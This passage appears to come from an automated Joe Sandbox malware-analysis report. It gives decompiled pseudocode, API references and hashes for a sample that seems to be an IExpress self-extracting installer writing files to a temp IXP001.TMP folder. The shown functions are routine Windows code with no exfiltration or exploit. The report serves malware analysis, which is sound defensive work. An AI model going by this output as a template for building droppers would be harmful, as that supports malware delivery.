                                                                                                                                                                                                                                            							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							_t23 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x00a019e0
                                                                                                                                                                                                                                            0x00a019e0
                                                                                                                                                                                                                                            0x00a019eb
                                                                                                                                                                                                                                            0x00a019f2
                                                                                                                                                                                                                                            0x00a019f9
                                                                                                                                                                                                                                            0x00a019fc
                                                                                                                                                                                                                                            0x00a01a01
                                                                                                                                                                                                                                            0x00a01a2a
                                                                                                                                                                                                                                            0x00a01a2e
                                                                                                                                                                                                                                            0x00a01a3e
                                                                                                                                                                                                                                            0x00a01a4f
                                                                                                                                                                                                                                            0x00a01a62
                                                                                                                                                                                                                                            0x00a01a6a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01a03
                                                                                                                                                                                                                                            0x00a01a06
                                                                                                                                                                                                                                            0x00a01a20
                                                                                                                                                                                                                                            0x00a01a20
                                                                                                                                                                                                                                            0x00a01a08
                                                                                                                                                                                                                                            0x00a01a08
                                                                                                                                                                                                                                            0x00a01a14
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01a16
                                                                                                                                                                                                                                            0x00a01a18
                                                                                                                                                                                                                                            0x00a01a70
                                                                                                                                                                                                                                            0x00a01a72
                                                                                                                                                                                                                                            0x00a01a72
                                                                                                                                                                                                                                            0x00a01a14
                                                                                                                                                                                                                                            0x00a01a06
                                                                                                                                                                                                                                            0x00a01a81

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A01A18
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A01A24
                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 00A01A4F
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A01A62
                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 00A01A6A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                            • Opcode ID: 00af7542c5da210b3a97bbb14a0b3ade4a13165b1c45639cf15196a985117393
                                                                                                                                                                                                                                            • Instruction ID: d5b0bbb0aa3991503cf02445fd24a92bb67142ff809d2419cd5d64592a1c10fd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00af7542c5da210b3a97bbb14a0b3ade4a13165b1c45639cf15196a985117393
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A11A13160120DAFDB10EFA8EE08AEE77B8FF59350F108254F916961D1DA349E03DB95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A07155() {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_t23 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                            					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                            					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                            					_t39 = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0xbb40e64e || ( *0xa08004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                            						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                            						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa08004 = _t39;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t37 =  !_t36;
                                                                                                                                                                                                                                            				 *0xa08008 = _t37;
                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a0715d
                                                                                                                                                                                                                                            0x00a07161
                                                                                                                                                                                                                                            0x00a07165
                                                                                                                                                                                                                                            0x00a07178
                                                                                                                                                                                                                                            0x00a07182
                                                                                                                                                                                                                                            0x00a0718e
                                                                                                                                                                                                                                            0x00a07197
                                                                                                                                                                                                                                            0x00a071a0
                                                                                                                                                                                                                                            0x00a071b1
                                                                                                                                                                                                                                            0x00a071b8
                                                                                                                                                                                                                                            0x00a071c4
                                                                                                                                                                                                                                            0x00a071c7
                                                                                                                                                                                                                                            0x00a071cb
                                                                                                                                                                                                                                            0x00a071d5
                                                                                                                                                                                                                                            0x00a071da
                                                                                                                                                                                                                                            0x00a071da
                                                                                                                                                                                                                                            0x00a071dc
                                                                                                                                                                                                                                            0x00a071dc
                                                                                                                                                                                                                                            0x00a071e2
                                                                                                                                                                                                                                            0x00a071e5
                                                                                                                                                                                                                                            0x00a071ee

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A07182
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00A07191
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00A0719A
                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00A071A3
                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00A071B8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                            • Opcode ID: 18b4ae4e655cda6f2047510d8c49c74ee24a78ca7d7ddd6725548cb9685db821
                                                                                                                                                                                                                                            • Instruction ID: 53a05d7381e3cb7d99dbc2c357ab2ac9bbced0d72c142ae94b4963fef31d1069
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18b4ae4e655cda6f2047510d8c49c74ee24a78ca7d7ddd6725548cb9685db821
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7113A71D0120CDBCB10DFF8EA48A9EB7F4EF18310F614A65D906E7250EA349A068F45
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                            			E00A063C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				long _v272;
                                                                                                                                                                                                                                            				void* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                            				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_v276 = _a16;
                                                                                                                                                                                                                                            				_t37 = 1;
                                                                                                                                                                                                                                            				E00A01781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            				E00A0658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                            				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                            					_t28 = _a4;
                                                                                                                                                                                                                                            					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                            						 *0xa09124 = 0x80070052;
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					CloseHandle(_t39);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					 *0xa09124 = 0x80070052;
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                            0x00a063cb
                                                                                                                                                                                                                                            0x00a063d2
                                                                                                                                                                                                                                            0x00a063d8
                                                                                                                                                                                                                                            0x00a063ea
                                                                                                                                                                                                                                            0x00a063f3
                                                                                                                                                                                                                                            0x00a06401
                                                                                                                                                                                                                                            0x00a06402
                                                                                                                                                                                                                                            0x00a06410
                                                                                                                                                                                                                                            0x00a06415
                                                                                                                                                                                                                                            0x00a06433
                                                                                                                                                                                                                                            0x00a06438
                                                                                                                                                                                                                                            0x00a06449
                                                                                                                                                                                                                                            0x00a06463
                                                                                                                                                                                                                                            0x00a0646d
                                                                                                                                                                                                                                            0x00a06477
                                                                                                                                                                                                                                            0x00a06477
                                                                                                                                                                                                                                            0x00a0647a
                                                                                                                                                                                                                                            0x00a0643a
                                                                                                                                                                                                                                            0x00a0643a
                                                                                                                                                                                                                                            0x00a06444
                                                                                                                                                                                                                                            0x00a06444
                                                                                                                                                                                                                                            0x00a06492

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A0642D
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A0645B
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A0647A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A063EB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 1065093856-3647970563
                                                                                                                                                                                                                                            • Opcode ID: 31ea3cd3b0e60d1d7ad317e12fe6ec893353c2cdba6a5e4cbb0592bd59c64fac
                                                                                                                                                                                                                                            • Instruction ID: af35a26c17d7d8417716961942f982e6a4a1865fac495a8ff974d24e78fca2f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31ea3cd3b0e60d1d7ad317e12fe6ec893353c2cdba6a5e4cbb0592bd59c64fac
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8721D271A0021CAFDB10DF65EC85FEB7378EB54314F0042A9F585A3280DBB06D968FA4
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A047E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                                            				void _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                            				if(_t34 != 0) {
                                                                                                                                                                                                                                            					_t22 = _t33;
                                                                                                                                                                                                                                            					_t27 = _t22 + 1;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t6 =  *_t22;
                                                                                                                                                                                                                                            						_t22 = _t22 + 1;
                                                                                                                                                                                                                                            					} while (_t6 != 0);
                                                                                                                                                                                                                                            					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                            					 *_t34 = _t24;
                                                                                                                                                                                                                                            					if(_t24 != 0) {
                                                                                                                                                                                                                                            						_t28 = _t33;
                                                                                                                                                                                                                                            						_t19 = _t28 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t9 =  *_t28;
                                                                                                                                                                                                                                            							_t28 = _t28 + 1;
                                                                                                                                                                                                                                            						} while (_t9 != 0);
                                                                                                                                                                                                                                            						E00A01680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                            						_t11 =  *0xa091e0; // 0x34e8ed0
                                                                                                                                                                                                                                            						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                            						 *0xa091e0 = _t34;
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t25 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            					E00A044B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					LocalFree(_t34);
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            				E00A044B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                            0x00a047e8
                                                                                                                                                                                                                                            0x00a047f0
                                                                                                                                                                                                                                            0x00a047f4
                                                                                                                                                                                                                                            0x00a0480f
                                                                                                                                                                                                                                            0x00a04811
                                                                                                                                                                                                                                            0x00a04814
                                                                                                                                                                                                                                            0x00a04814
                                                                                                                                                                                                                                            0x00a04816
                                                                                                                                                                                                                                            0x00a04817
                                                                                                                                                                                                                                            0x00a04829
                                                                                                                                                                                                                                            0x00a0482b
                                                                                                                                                                                                                                            0x00a0482f
                                                                                                                                                                                                                                            0x00a0484f
                                                                                                                                                                                                                                            0x00a04852
                                                                                                                                                                                                                                            0x00a04855
                                                                                                                                                                                                                                            0x00a04855
                                                                                                                                                                                                                                            0x00a04857
                                                                                                                                                                                                                                            0x00a04858
                                                                                                                                                                                                                                            0x00a04860
                                                                                                                                                                                                                                            0x00a04865
                                                                                                                                                                                                                                            0x00a0486a
                                                                                                                                                                                                                                            0x00a0486f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04876
                                                                                                                                                                                                                                            0x00a04831
                                                                                                                                                                                                                                            0x00a04841
                                                                                                                                                                                                                                            0x00a04847
                                                                                                                                                                                                                                            0x00a0480b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0480b
                                                                                                                                                                                                                                            0x00a047f6
                                                                                                                                                                                                                                            0x00a04806
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A04E6F), ref: 00A047EA
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00A04823
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A04847
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A04851
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 359063898-3647970563
                                                                                                                                                                                                                                            • Opcode ID: de91450d53bb1751fc199c9b9ebddbd383c5f7facf084e5f938808e363a060f1
                                                                                                                                                                                                                                            • Instruction ID: 286452fa1e6f1990ce3a37b36f447068416d5f0601d0b194620182bf5157e337
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de91450d53bb1751fc199c9b9ebddbd383c5f7facf084e5f938808e363a060f1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B611E3B5604649AFD7548F74AC18B723B5AFB89300F048919EB8297281DA369C0B8660
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A03680(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct tagMSG _v36;
                                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                            								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t16 = 1;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                            						} while (_t8 != 0);
                                                                                                                                                                                                                                            						if(_t16 == 0) {
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x00a0368c
                                                                                                                                                                                                                                            0x00a0368f
                                                                                                                                                                                                                                            0x00a03691
                                                                                                                                                                                                                                            0x00a0369f
                                                                                                                                                                                                                                            0x00a036a7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a036ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a036bc
                                                                                                                                                                                                                                            0x00a036bc
                                                                                                                                                                                                                                            0x00a036c0
                                                                                                                                                                                                                                            0x00a036cb
                                                                                                                                                                                                                                            0x00a036c2
                                                                                                                                                                                                                                            0x00a036c4
                                                                                                                                                                                                                                            0x00a036c4
                                                                                                                                                                                                                                            0x00a036da
                                                                                                                                                                                                                                            0x00a036e0
                                                                                                                                                                                                                                            0x00a036e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a036e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a036ba
                                                                                                                                                                                                                                            0x00a036ed

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A0369F
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A036B2
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00A036CB
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A036DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                            • Opcode ID: 7e36db9670bd1bed826a062eb9e624116a1793ab8c7f7cd8d5c2e23126a38f98
                                                                                                                                                                                                                                            • Instruction ID: 7688ea1ae80da15b37b26b1ebabfbb47dac45813bb5b7e9c623bfaa8f18360a3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e36db9670bd1bed826a062eb9e624116a1793ab8c7f7cd8d5c2e23126a38f98
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9701677390025D77DF308BE66C48EEB767CEBC6B10F140219F915E21C0D565C655C6A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00A06517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                            				struct HRSRC__* _t6;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t23 =  *0xa09a3c; // 0xa00000
                                                                                                                                                                                                                                            				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t24 = _a16;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                            						FreeResource(_t21);
                                                                                                                                                                                                                                            						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x00a0651f
                                                                                                                                                                                                                                            0x00a0652a
                                                                                                                                                                                                                                            0x00a06534
                                                                                                                                                                                                                                            0x00a0656b
                                                                                                                                                                                                                                            0x00a06577
                                                                                                                                                                                                                                            0x00a0657c
                                                                                                                                                                                                                                            0x00a06536
                                                                                                                                                                                                                                            0x00a0653e
                                                                                                                                                                                                                                            0x00a06542
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06544
                                                                                                                                                                                                                                            0x00a06547
                                                                                                                                                                                                                                            0x00a0654c
                                                                                                                                                                                                                                            0x00a06549
                                                                                                                                                                                                                                            0x00a06549
                                                                                                                                                                                                                                            0x00a06549
                                                                                                                                                                                                                                            0x00a0655e
                                                                                                                                                                                                                                            0x00a06560
                                                                                                                                                                                                                                            0x00a06569
                                                                                                                                                                                                                                            0x00000000
